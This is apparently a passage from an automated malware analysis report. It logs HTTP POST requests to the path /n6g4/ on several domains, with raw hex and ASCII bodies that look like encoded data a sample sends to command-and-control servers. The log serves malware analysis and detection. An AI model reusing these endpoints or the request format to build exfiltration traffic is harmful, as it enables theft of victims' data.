6f 44 31 56 34 58 57 4e 71 43 46 34 50 43 59 36 4f 7a 79 42 58 7e 66 49 4d 42 71 7a 71 31 32 52 38 72 43 6d 6a 78 4a 6d 42 46 6d 6e 4c 48 4c 49 79 59 57 48 79 4f 57 59 75 32 31 45 4f 6e 67 33 36 49 4e 72 38 75 49 73 4b 61 52 78 48 51 4b 37 4b 55 73 46 34 54 58 33 4f 38 4d 5a 30 6d 63 75 39 53 67 37 37 37 56 4e 30 36 30 35 54 45 6d 36 54 51 42 64 4f 5a 53 31 63 41 6e 6c 48 38 41 32 4a 44 38 4e 4c 58 4f 75 36 5a 42 52 4b 75 4c 68 35 69 66 43 49 4a 71 68 34 4b 76 66 71 37 4d 42 7a 69 64 4f 48 76 4e 62 65 50 33 35 53 45 55 56 64 46 46 52 5f 77 77 51 71 4d 61 54 72 30 32 52 30 69 45 53 2d 52 64 61 41 48 32 76 72 65 31 44 43 34 71 44 66 6d 67 79 6e 65 5f 58 57 39 51 35 75 56 4b 51 77 41 33 53 35 47 50 44 50 5a 34 4c 72 79 77 61 49 44 2d 74 43 42 68 71 75 72 36 6f 78 50 76 4a 68 48 37 34 74 4d 32 39 65 77 68 73 47 38 4f 48 36 28
          Source: global trafficHTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.kickball.siteConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.kickball.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kickball.site/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 5a 4e 45 5a 34 68 33 30 28 71 39 44 6e 45 76 73 72 5a 49 6e 36 41 6b 32 52 32 42 6e 4c 49 58 75 79 44 6f 78 4b 39 65 5f 67 73 78 61 49 79 58 35 58 51 65 5a 78 6f 48 66 53 49 56 46 4e 38 66 38 65 6c 57 59 74 6c 44 44 69 38 54 41 76 35 32 35 47 65 48 68 62 38 68 63 59 49 4b 72 44 35 6e 4d 32 6a 48 30 50 54 56 42 78 59 32 73 53 55 50 68 52 67 35 44 68 66 42 50 55 61 78 5a 67 31 78 5f 6c 79 37 78 7e 57 34 76 6d 52 59 5f 79 55 45 64 6a 6d 4b 63 45 46 43 6e 77 37 6d 55 71 7a 6b 6a 58 64 4c 6a 53 48 59 36 4c 61 4a 4b 4a 71 74 75 64 4d 32 77 44 64 41 34 37 33 28 54 51 62 34 43 36 4f 59 6c 35 64 46 78 65 76 4f 77 6a 71 69 33 33 32 6e 49 63 48 58 64 58 5f 49 51 6f 49 42 63 72 31 70 5f 73 73 61 47 52 4d 58 55 48 69 66 61 70 65 33 45 35 38 57 4f 6d 59 45 33 44 72 6f 57 4a 30 77 74 67 5f 64 64 54 4d 4d 41 57 69 61 7a 45 37 4d 58 37 53 77 74 48 68 71 6b 38 31 55 4b 4a 44 76 66 4e 33 47 49 46 75 4a 6e 6b 41 44 39 4a 56 76 75 4a 5f 48 45 6f 6b 47 64 69 61 54 45 28 7a 33 32 6f 75 54 54 69 66 66 44 6f 72 67 75 74 59 44 36 56 37 4d 61 4d 4c 54 44 30 53 39 76 69 4a 38 57 45 38 56 33 58 52 4f 5a 41 67 71 31 61 71 4e 44 45 44 76 32 62 72 38 44 47 43 6a 6f 62 33 57 6e 79 6d 4a 42 6f 71 6a 58 46 4e 78 47 76 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=ZNEZ4h30(q9DnEvsrZIn6Ak2R2BnLIXuyDoxK9e_gsxaIyX5XQeZxoHfSIVFN8f8elWYtlDDi8TAv525GeHhb8hcYIKrD5nM2jH0PTVBxY2sSUPhRg5DhfBPUaxZg1x_ly7x~W4vmRY_yUEdjmKcEFCnw7mUqzkjXdLjSHY6LaJKJqtudM2wDdA473(TQb4C6OYl5dFxevOwjqi332nIcHXdX_IQoIBcr1p_ssaGRMXUHifape3E58WOmYE3DroWJ0wtg_ddTMMAWiazE7MX7SwtHhqk81UKJDvfN3GIFuJnkAD9JVvuJ_HEokGdiaTE(z32ouTTiffDorgutYD6V7MaMLTD0S9viJ8WE8V3XROZAgq1aqNDEDv2br8DGCjob3WnymJBoqjXFNxGvw).
          Source: global trafficHTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.kickball.siteConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.kickball.siteUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kickball.site/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 5a 4e 45 5a 34 6a 7a 59 79 37 51 44 72 30 69 43 71 4d 73 7a 77 51 30 30 58 47 4e 69 53 70 4c 31 31 79 34 62 58 73 75 43 75 4f 78 45 5a 32 7a 55 54 58 54 4b 78 71 76 6d 59 71 68 42 48 38 62 5f 65 68 79 6d 74 6c 48 44 6a 39 36 4c 75 65 53 66 46 39 76 69 63 63 68 4b 4b 49 4b 75 48 34 36 71 32 6a 44 47 50 54 64 76 78 74 71 73 53 33 6e 68 54 6e 46 2d 76 66 42 4e 49 4c 42 7a 6b 31 73 41 6c 79 6a 58 7e 54 51 76 6e 68 63 5f 7a 33 4d 65 68 68 7e 62 63 46 43 75 7a 4c 6d 33 68 54 6f 33 58 64 48 4e 53 47 6b 36 4c 50 52 4b 4c 36 4e 75 66 37 69 7a 61 39 41 78 77 58 28 55 55 62 31 4d 36 4f 45 70 35 5a 31 4c 65 64 53 77 6a 61 69 32 68 48 76 41 59 51 36 46 56 38 55 33 6f 49 4e 31 72 67 77 71 73 75 66 54 57 39 6e 5a 4d 6b 71 4e 70 64 62 36 30 38 57 56 74 34 46 72 44 72 6f 63 4a 30 78 4f 67 2d 4e 64 54 50 73 41 57 42 79 7a 4d 37 4d 51 75 53 77 52 4c 42 72 32 34 77 4d 30 4a 44 33 6c 4e 32 7e 59 46 61 31 6e 72 77 7a 39 65 43 37 70 51 76 48 47 73 6b 47 38 6f 36 54 42 28 7a 33 55 6f 71 47 55 6a 6f 48 44 70 36 67 75 39 4c 6e 36 58 4c 4d 61 51 37 54 37 28 79 67 79 69 49 59 53 45 39 6b 49 58 69 69 5a 44 31 7e 31 61 4c 4e 44 49 54 76 32 54 4c 39 45 4c 68 61 46 59 6c 43 76 7e 6d 45 71 68 75 43 7a 4e 64 68 4f 31 45 56 42 78 77 33 4b 36 4b 4f 34 48 54 55 33 79 44 4d 41 42 53 64 76 62 37 58 70 6e 57 7a 59 57 4d 39 38 6c 71 52 48 35 6f 4f 7a 31 42 67 2d 53 70 43 54 79 58 28 62 49 41 6c 41 7a 6d 52 75 43 51 39 74 39 41 4a 2d 73 6a 76 58 4f 4d 7e 7a 4d 34 42 6b 6e 7a 4b 7a 49 69 55 32 6b 72 30 5a 6c 6a 73 70 68 72 49 45 79 44 56 45 59 32 73 46 73 35 6e 58 6f 68 54 45 78 73 50 61 75 42 6e 70 77 5f 35 52 72 33 33 64 70 4e 34 69 42 78 39 32 4d 4f 64 43 63 67 47 42 52 4b 62 70 6c 52 41 32 46 6c 52 71 71 6f 72 51 67 72 53 51 4c 62 4c 46 70 76 69 46 34 52 76 41 76 4d 59 33 4d 4d 73 76 48 53 74 41 39 49 77 4f 6b 43 56 41 34 56 64 66 61 59 31 41 6b 4d 43 49 4d 46 4c 78 51 51 64 6a 57 67 59 58 4a 43 42 73 70 66 79 6d 53 37 47 4a 47 71 36 45 57 6f 6e 59 4e 78 44 32 76 66 41 54 6f 32 56 63 38 48 49 54 37 67 4b 2d 43 56 52 69 41 4a 75 6f 56 7a 33 62 68 37 65 55 72 37 75 76 37 66 59 43 32 47 6d 66 78 6e 5a 2d 4f 5a 77 65 7e 70 47 33 39 71 4a 70 43 5f 49 44 4d 46 4a 41 46 48 33 79 58 74 68 64 7a 7a 6c 41 35 4f 68 76 58 4f 72 74 6d 4e 6d 65 78 56 28 41 55 39 58 38 46 31 34 6e 52 33 4d 57 4a 4a 48 43 67 4c 4f 75 7e 78 4e 50 6d 4e 5a 68 6e 73 54 36 6a 55 74 6f 75 46 67 5f 7a 4a 4f 5f 61 4c 39 38 72 70 66 4a 65 72 66 2d 4e 48 6a 50 4b 75 4a 46 67 75 32 65 53 65 37 6b 33 4e 4b 4b 6a 4c 69 4e 46 35 42 6f 6a 38 54 43 4f 61 33 4f 44 51 64 70 4c 69 38 5a 7e 5f 37 44 63 79 57 36 48 52 35 74 6e
          Source: global trafficHTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.bldh45.xyzConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.bldh45.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bldh45.xyz/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 52 70 4c 67 49 62 6c 5f 30 63 7e 41 70 57 36 7a 77 43 37 73 6e 64 69 62 74 4c 7e 42 6d 38 77 36 4d 76 48 76 67 79 33 58 4f 6c 39 54 50 49 38 45 63 34 50 74 4e 68 53 44 74 5f 7a 44 28 38 4e 79 30 31 42 56 65 30 39 63 44 35 50 51 73 38 53 55 6c 51 51 70 76 54 5a 46 59 55 45 4e 71 53 54 56 38 42 30 4d 57 47 35 47 65 53 6f 49 73 70 4a 58 72 50 33 41 79 48 72 68 77 71 6e 5f 50 6b 48 74 6a 64 79 79 43 69 42 5a 44 54 33 46 59 42 62 68 6d 6e 72 69 30 52 38 58 38 59 71 37 78 34 39 64 59 54 65 71 68 66 69 4a 70 6c 63 49 53 2d 70 4a 4e 32 75 65 74 47 65 4c 32 4d 62 76 62 53 72 5f 7a 6b 68 46 74 61 76 50 50 46 28 6f 77 52 77 6d 4c 47 74 4f 7e 7a 63 67 46 44 36 59 4e 4a 77 55 77 6a 62 6b 4d 4b 76 70 30 6b 41 54 6b 69 36 5f 6f 7a 66 67 6e 52 42 79 79 49 78 6f 6b 32 76 79 30 31 37 55 6d 6f 77 73 5a 71 37 51 42 54 4a 4f 35 70 42 4c 6f 49 6b 53 46 74 77 66 37 66 52 67 57 63 46 6e 65 58 56 45 72 66 61 4a 68 39 63 41 53 43 78 42 79 4e 62 45 43 32 58 44 69 77 66 67 49 59 7a 6e 33 44 43 36 6c 6a 41 46 79 4c 57 39 70 51 64 41 73 63 71 6b 7a 31 59 31 55 30 47 4d 4d 33 72 33 39 77 75 55 36 71 76 64 59 79 69 6d 71 5f 6e 68 69 33 49 6b 7e 48 7e 70 37 75 62 42 36 45 31 55 69 5a 6e 73 47 77 73 79 28 37 7a 35 69 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=RpLgIbl_0c~ApW6zwC7sndibtL~Bm8w6MvHvgy3XOl9TPI8Ec4PtNhSDt_zD(8Ny01BVe09cD5PQs8SUlQQpvTZFYUENqSTV8B0MWG5GeSoIspJXrP3AyHrhwqn_PkHtjdyyCiBZDT3FYBbhmnri0R8X8Yq7x49dYTeqhfiJplcIS-pJN2uetGeL2MbvbSr_zkhFtavPPF(owRwmLGtO~zcgFD6YNJwUwjbkMKvp0kATki6_ozfgnRByyIxok2vy017UmowsZq7QBTJO5pBLoIkSFtwf7fRgWcFneXVErfaJh9cASCxByNbEC2XDiwfgIYzn3DC6ljAFyLW9pQdAscqkz1Y1U0GMM3r39wuU6qvdYyimq_nhi3Ik~H~p7ubB6E1UiZnsGwsy(7z5iA).
          Source: global trafficHTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.bldh45.xyzConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.bldh45.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bldh45.xyz/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 52 70 4c 67 49 61 4a 51 74 76 4b 72 32 33 47 59 6a 6e 66 6a 7a 39 79 64 75 37 4c 50 6f 59 6b 78 4f 74 28 37 39 6e 4b 76 50 67 49 47 4c 34 67 70 58 66 71 6f 4e 68 44 6e 68 70 44 66 37 63 42 78 30 31 5a 37 65 31 4a 63 43 36 50 41 73 64 44 78 6d 7a 34 6d 72 7a 5a 54 5a 55 46 4c 75 51 33 30 38 42 41 69 57 47 42 6f 64 68 38 49 73 4e 68 58 38 59 6a 4a 39 48 71 71 7e 4b 33 72 42 45 44 6a 6a 5a 6e 74 43 69 39 5a 43 6a 37 46 59 67 4c 6d 67 6b 54 74 7a 42 38 57 70 6f 71 79 7e 59 34 6b 59 54 61 49 68 61 43 4a 75 58 34 49 44 39 68 4a 4a 33 75 64 7e 32 65 4f 67 38 62 59 4e 69 6e 55 7a 6b 39 7a 74 62 62 31 4d 33 6a 6f 77 68 77 64 50 58 6c 38 30 41 31 69 48 41 6e 30 4e 4a 73 78 77 58 54 73 4d 4c 76 4a 39 79 4e 37 36 55 47 56 6f 78 7a 65 68 78 42 32 38 6f 77 30 6b 32 75 46 30 31 37 36 6d 70 67 73 5a 70 4c 51 43 77 78 4f 79 70 42 49 7e 6f 6b 55 4d 4e 77 45 28 66 55 48 57 63 63 49 65 57 4e 2d 7e 38 75 4a 69 4a 59 41 48 78 70 4f 35 4e 62 43 47 32 57 52 31 67 66 72 49 59 7a 5a 33 48 32 71 6c 51 30 46 77 65 36 39 75 7a 31 41 76 73 71 6b 32 31 59 37 64 55 4c 4a 4d 78 44 37 39 78 7e 62 36 62 72 64 59 45 57 6d 71 62 54 68 69 48 49 6b 79 6e 28 59 30 64 71 72 28 78 68 64 7a 49 33 5f 4a 51 39 59 35 37 32 30 67 54 4f 72 34 64 44 48 6e 69 53 73 75 44 55 73 49 37 43 50 35 52 46 67 62 68 4f 31 67 70 66 77 71 63 78 65 4b 52 4b 33 38 79 63 38 64 51 59 45 63 76 6f 48 6a 4f 63 52 59 30 35 44 33 4c 4d 37 38 32 4e 6e 66 6a 4a 39 28 4c 35 33 7a 6e 6f 78 78 4b 55 4a 4c 42 28 74 61 65 36 69 4a 41 61 76 65 57 6c 74 58 56 4c 78 63 49 51 46 39 34 38 74 7a 44 6a 44 71 64 63 5a 56 48 4d 44 68 45 6e 36 71 4e 7e 63 67 42 69 71 59 58 45 57 4b 48 74 55 7a 39 32 52 62 52 33 7a 37 6d 50 38 61 67 58 48 57 55 32 33 37 6e 63 6c 51 32 74 36 48 31 48 78 69 4a 48 2d 62 70 4e 70 4d 30 5a 41 36 6c 32 4a 68 55 63 4d 28 68 41 53 4c 31 6f 78 39 63 53 2d 68 61 79 43 57 43 64 64 38 5f 68 39 76 72 45 4d 38 34 68 41 28 50 43 34 50 54 6c 57 4a 32 4c 51 71 6d 6a 6e 58 42 28 47 56 47 34 4e 6f 64 72 68 75 70 34 49 7a 33 50 55 61 58 7e 57 48 59 4e 2d 76 4f 57 4d 47 56 72 6b 79 6c 61 65 77 74 4c 44 66 68 4b 69 65 4a 78 37 78 76 77 73 31 6f 46 31 6f 75 41 49 41 66 28 30 68 59 49 54 7e 68 47 76 6c 34 70 36 4c 43 63 73 55 78 5a 43 53 65 43 53 75 59 69 4a 62 5f 61 45 4c 46 61 72 6c 74 50 44 6a 58 6b 33 4d 64 71 4c 72 30 38 70 32 75 33 59 35 4b 39 37 41 48 57 6a 57 35 36 6a 66 53 6c 30 68 32 34 35 49 4c 47 5a 37 33 53 53 78 4f 65 6a 35 67 45 38 75 59 28 76 41 7a 77 77 28 62 6a 32 53 2d 34 51 76 66 58 44 76 54 28 59 64 69 47 4c 56 72 69 47 6e 39 4e 54 41 77 32 30 30 71 62 41 47 30 49 6e 7a 78 38 38 68 53 67 30 6f 71 32 4b
          Source: global trafficHTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.properscooter.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.properscooter.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.properscooter.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 4d 63 72 58 76 50 6c 39 44 31 61 41 74 71 5a 4c 36 5a 4f 71 77 51 61 46 76 46 6d 52 54 51 73 63 59 70 53 5a 4c 4e 54 6d 51 5a 53 5a 4b 47 37 6d 62 59 79 45 76 79 6e 74 35 74 4b 61 70 61 4b 71 69 6b 45 66 58 46 53 6d 49 73 68 71 4b 7a 47 44 36 4b 4c 68 35 37 58 35 31 2d 53 6b 63 6d 75 39 37 39 61 63 76 45 56 42 57 48 57 4d 76 6c 74 79 78 6b 71 4a 70 73 4d 68 75 75 51 6e 76 72 63 54 39 69 52 55 32 64 62 6d 76 54 4a 35 7e 4d 6d 46 74 39 41 37 47 32 74 53 46 61 6b 78 58 63 43 31 4c 61 4c 42 58 6b 7a 48 4c 58 76 50 44 57 56 38 69 59 34 6e 30 41 75 4e 6d 65 74 49 6c 7a 4a 69 4d 61 56 73 48 5a 58 50 43 48 7e 35 64 38 52 35 65 75 4b 47 6d 76 64 41 72 42 28 59 30 72 67 47 4c 50 58 65 4f 4c 39 78 63 57 4c 43 28 49 4c 37 4d 71 49 78 64 62 38 70 6b 6f 65 5a 6f 5f 6b 4b 63 72 77 45 28 54 75 38 6d 38 74 38 4c 2d 65 5f 52 6f 43 64 5a 72 78 6b 59 53 68 42 28 30 68 63 52 4a 73 74 45 59 4f 37 67 42 39 32 42 6e 61 65 45 6e 76 2d 45 34 78 5a 38 45 64 5a 72 52 74 72 37 69 6c 36 39 4f 33 73 44 67 58 58 67 4b 73 4e 41 4d 79 50 62 31 57 71 73 55 7e 55 32 4f 65 62 42 51 64 5a 76 4b 45 56 46 68 31 63 54 70 6c 55 36 44 54 47 33 48 76 31 74 77 37 6e 50 6b 69 64 41 36 79 5f 73 65 78 77 50 34 53 55 59 39 68 49 48 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=McrXvPl9D1aAtqZL6ZOqwQaFvFmRTQscYpSZLNTmQZSZKG7mbYyEvynt5tKapaKqikEfXFSmIshqKzGD6KLh57X51-Skcmu979acvEVBWHWMvltyxkqJpsMhuuQnvrcT9iRU2dbmvTJ5~MmFt9A7G2tSFakxXcC1LaLBXkzHLXvPDWV8iY4n0AuNmetIlzJiMaVsHZXPCH~5d8R5euKGmvdArB(Y0rgGLPXeOL9xcWLC(IL7MqIxdb8pkoeZo_kKcrwE(Tu8m8t8L-e_RoCdZrxkYShB(0hcRJstEYO7gB92BnaeEnv-E4xZ8EdZrRtr7il69O3sDgXXgKsNAMyPb1WqsU~U2OebBQdZvKEVFh1cTplU6DTG3Hv1tw7nPkidA6y_sexwP4SUY9hIHg).
          Source: global trafficHTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.properscooter.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.properscooter.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.properscooter.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 4d 63 72 58 76 4f 4a 56 48 45 48 51 6f 36 55 64 35 76 43 45 37 41 4b 48 74 31 71 55 5a 79 70 45 50 34 44 39 57 5a 58 66 43 4a 36 66 4f 79 6a 48 52 5f 65 6d 76 7a 57 44 77 2d 7e 57 36 4b 4f 72 69 6b 63 41 58 46 57 6d 4c 73 5a 36 4a 55 44 6f 39 73 33 67 36 62 57 63 30 2d 54 69 59 6b 62 79 37 39 65 45 76 48 30 61 57 33 36 4d 7e 32 56 79 6d 7a 57 30 6b 73 4d 37 6e 4f 42 34 77 37 41 64 39 69 5a 4d 32 59 6a 6d 36 7a 46 35 28 6f 69 45 6b 65 34 34 4c 47 74 58 51 71 6c 6e 65 38 65 66 4c 62 28 6a 58 6b 50 48 4c 6c 62 50 46 47 31 38 79 37 41 6d 28 51 75 56 73 2d 73 58 79 6a 31 33 4d 61 4a 67 48 63 6d 79 43 32 4b 35 66 4d 52 30 62 5f 54 37 71 63 6c 58 34 51 62 76 30 72 6b 5f 4c 61 33 57 4f 4a 70 52 61 6c 54 70 78 4b 54 52 4d 76 35 55 52 62 38 6c 38 34 66 62 6f 5f 6b 4d 63 72 77 6d 28 51 47 38 6d 5f 4e 38 45 39 57 5f 58 49 43 65 51 37 78 39 53 79 68 61 75 6b 73 51 52 4a 30 54 45 63 53 42 67 30 39 32 62 57 71 65 4d 67 37 78 4f 34 78 6c 71 30 64 65 76 52 74 65 37 69 6b 74 39 50 32 6e 43 54 7a 58 67 66 59 4e 43 5a 6d 50 64 46 57 71 6a 30 7e 53 28 75 69 4c 42 55 78 64 76 4b 30 5f 45 53 35 63 64 62 42 55 36 6e 6e 47 6b 6e 76 31 68 51 36 46 4a 31 58 30 43 4c 69 79 28 65 5a 4e 53 39 7a 71 64 5f 49 47 57 56 4a 6b 61 5f 66 79 69 57 4c 6d 4b 7a 64 2d 59 73 30 5f 6d 70 61 30 71 4f 62 47 36 46 4a 48 48 68 66 5f 61 5a 7e 71 38 67 68 42 6b 4d 39 49 77 62 49 71 75 39 52 63 56 73 6f 68 55 77 58 4a 41 53 4b 6a 47 42 41 62 63 61 7a 48 4f 5f 44 49 54 55 35 31 73 64 5a 31 4d 44 39 69 78 74 63 39 58 5f 42 52 73 68 42 51 67 6b 74 34 74 65 56 7a 45 47 54 54 5a 77 44 58 43 54 28 77 7e 48 71 74 67 68 57 48 64 42 6a 72 7e 53 4f 5a 6c 70 35 6e 41 57 34 71 34 44 5a 53 50 47 54 76 63 6a 6b 67 6a 6f 67 59 62 53 4c 72 79 61 35 61 55 37 6a 78 54 51 39 44 46 51 44 44 35 67 69 51 47 6e 47 6b 52 7a 6a 73 50 4e 4a 4a 6f 79 51 61 50 54 45 57 44 75 46 46 4c 6f 30 75 78 5f 28 4f 6d 33 47 4e 56 7a 77 4b 43 33 49 36 79 54 45 6f 34 30 73 68 7e 6a 69 4e 37 4f 4c 67 4c 6b 6b 47 47 68 79 44 62 65 69 70 74 71 58 74 6b 76 48 76 6e 52 48 4e 46 44 4c 6c 32 70 63 74 49 52 7a 4e 32 70 64 56 6d 6f 4b 50 37 45 50 4d 69 44 63 50 30 62 73 66 71 6f 45 63 64 69 4c 5f 57 6c 47 66 75 4f 6e 55 49 53 6e 71 7a 61 7a 63 6f 48 41 74 48 4b 5a 32 55 48 54 50 79 79 6b 4b 7e 45 7a 64 30 4c 34 5f 4a 59 41 6d 43 58 45 37 55 59 47 4c 72 72 69 38 6a 31 53 65 55 5a 37 61 74 54 73 4d 5a 61 58 34 67 67 4e 4c 6b 54 46 57 37 46 58 49 6b 61 74 5a 6d 79 6c 6f 45 71 62 64 54 5a 43 44 39 46 53 57 6c 62 7a 70 41 78 44 58 76 50 74 47 67 38 6f 6e 47 46 46 79 51 4f 61 39 55 6a 49 63 56 71 55 2d 59 69 52 73 6c 44 6b 59 4c
          Source: global trafficHTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.uspplongee.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.uspplongee.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.uspplongee.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 58 47 30 4a 59 71 51 6e 50 58 6d 4f 6f 44 77 4e 56 54 49 49 67 38 72 48 33 5f 53 4e 6f 6e 45 4e 54 43 66 44 32 43 7e 74 33 74 77 59 73 59 56 75 33 39 67 4b 78 54 4a 58 56 39 7a 70 54 69 49 58 41 59 77 54 59 32 4d 76 6e 74 54 6c 33 50 4b 6d 6d 69 72 39 65 79 52 54 71 4e 68 49 66 39 74 6c 28 57 47 4d 41 56 53 59 32 2d 72 51 70 7a 43 30 69 57 34 67 57 79 30 64 6c 36 53 5a 76 46 5a 6a 58 47 46 32 66 4f 57 4d 4b 43 79 67 75 33 34 45 6b 42 35 64 70 43 38 6d 79 77 4d 6a 6c 6f 35 66 62 30 39 75 65 6f 4f 4e 45 2d 28 52 51 2d 5a 38 32 62 56 76 77 36 30 6b 7e 4b 34 73 7e 57 48 31 4d 75 53 79 79 66 37 6e 35 39 55 30 35 70 39 38 42 34 36 36 53 59 31 44 34 6b 43 4b 73 33 56 4c 69 4c 32 70 38 49 6a 44 4d 52 4a 37 36 41 35 4e 33 51 54 77 54 63 66 48 4c 71 54 35 63 43 6d 32 77 63 77 71 50 5f 4d 69 6f 6b 75 5a 78 77 51 48 32 79 62 32 32 2d 72 38 33 43 36 7a 43 65 73 55 6d 6c 49 48 7a 4c 79 30 39 38 6a 47 54 79 39 66 53 46 63 35 7a 50 72 4c 4e 55 66 4f 59 76 68 77 74 4e 4b 61 41 7a 34 32 6f 62 6c 53 5a 2d 33 58 42 75 4e 71 55 78 71 6d 4a 49 36 43 57 37 36 6c 37 6c 45 62 6d 6b 61 75 43 34 50 73 46 66 5a 68 6a 42 73 46 6d 57 6a 46 35 31 71 31 57 4a 4e 77 28 4f 4d 68 5a 53 74 64 38 48 77 63 28 37 72 4e 66 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=XG0JYqQnPXmOoDwNVTIIg8rH3_SNonENTCfD2C~t3twYsYVu39gKxTJXV9zpTiIXAYwTY2MvntTl3PKmmir9eyRTqNhIf9tl(WGMAVSY2-rQpzC0iW4gWy0dl6SZvFZjXGF2fOWMKCygu34EkB5dpC8mywMjlo5fb09ueoONE-(RQ-Z82bVvw60k~K4s~WH1MuSyyf7n59U05p98B466SY1D4kCKs3VLiL2p8IjDMRJ76A5N3QTwTcfHLqT5cCm2wcwqP_MiokuZxwQH2yb22-r83C6zCesUmlIHzLy098jGTy9fSFc5zPrLNUfOYvhwtNKaAz42oblSZ-3XBuNqUxqmJI6CW76l7lEbmkauC4PsFfZhjBsFmWjF51q1WJNw(OMhZStd8Hwc(7rNfQ).
          Source: global trafficHTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.uspplongee.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.uspplongee.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.uspplongee.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 58 47 30 4a 59 72 73 78 42 47 65 62 33 6a 39 62 58 68 6f 48 72 74 62 4a 77 4a 4f 43 30 53 4d 53 55 32 62 32 37 6d 32 35 32 76 67 4e 37 34 67 68 7a 2d 51 43 78 58 4e 2d 62 76 6d 67 43 54 30 55 41 59 34 78 59 32 49 76 6b 75 53 69 33 6f 4f 63 6e 48 28 79 53 79 52 76 34 64 68 52 56 70 4e 49 28 57 79 2d 41 55 72 44 31 4f 58 51 6f 51 71 30 7a 46 41 37 49 69 31 57 74 62 28 47 77 56 64 45 58 47 64 75 66 4f 36 4d 4b 79 75 67 75 57 49 46 77 32 56 61 67 79 38 6e 7e 51 4e 67 75 49 6b 35 62 30 77 42 65 74 32 4e 46 49 58 52 52 75 35 38 28 49 39 67 37 71 30 68 70 61 34 74 36 57 61 73 4d 75 4f 41 79 62 69 51 35 50 49 30 34 5a 39 39 57 5f 6e 48 58 4c 74 74 36 67 44 59 73 33 52 6d 69 66 58 30 38 4a 4f 59 46 45 4e 41 7e 6d 4d 71 33 56 6a 57 53 38 66 44 41 4b 53 74 63 43 6e 58 77 63 77 51 50 5f 38 69 6f 6e 4f 5a 78 54 59 48 30 53 62 78 39 75 71 57 79 43 36 6f 51 75 67 71 6d 6b 67 68 7a 4c 71 4b 39 4f 6e 47 54 69 4e 66 51 6b 63 34 6e 66 72 4e 4a 55 66 56 50 5f 68 31 74 4e 4c 50 41 33 6b 6d 6f 49 68 53 61 4f 62 58 4d 74 6c 71 57 42 71 6d 48 6f 36 41 44 4c 32 4c 37 6c 63 66 6d 68 32 55 42 4c 6a 73 46 4e 52 68 6b 6b 59 46 72 47 6a 46 32 56 72 69 48 70 63 67 30 4e 64 4f 65 45 4a 39 31 51 35 4f 28 72 36 5f 4b 63 69 54 52 38 34 6c 62 36 45 34 6a 49 28 57 34 33 78 36 63 73 38 68 45 74 79 45 69 77 6d 69 63 68 58 30 69 6a 6b 63 28 30 37 43 46 76 4c 36 4b 58 30 78 78 78 55 42 55 34 76 73 79 6a 6f 73 78 55 74 48 67 48 54 7a 49 62 36 52 4b 48 53 55 7a 70 6d 52 77 66 6c 4c 49 7a 41 6d 62 4e 51 65 7a 6b 4e 77 72 74 66 58 48 2d 66 55 57 36 77 69 75 6b 73 6a 57 41 57 4d 63 73 4f 7a 78 58 44 69 47 4a 46 66 5a 6e 78 75 30 46 33 5a 6a 50 4f 4b 7e 61 44 79 4d 76 6a 4b 50 36 34 47 37 76 45 68 4a 4e 37 6d 4d 64 46 70 55 32 76 5f 75 53 64 61 35 6e 6c 34 6f 4d 77 49 48 5f 54 48 5a 6c 6b 54 75 57 70 59 75 79 7a 58 52 64 54 47 6d 5a 54 52 74 39 47 44 71 6e 61 67 65 2d 33 59 54 61 69 67 43 72 62 43 54 7a 71 42 68 44 4f 6d 4f 69 52 4b 7e 4d 4a 61 61 31 66 73 56 6e 47 7a 54 38 37 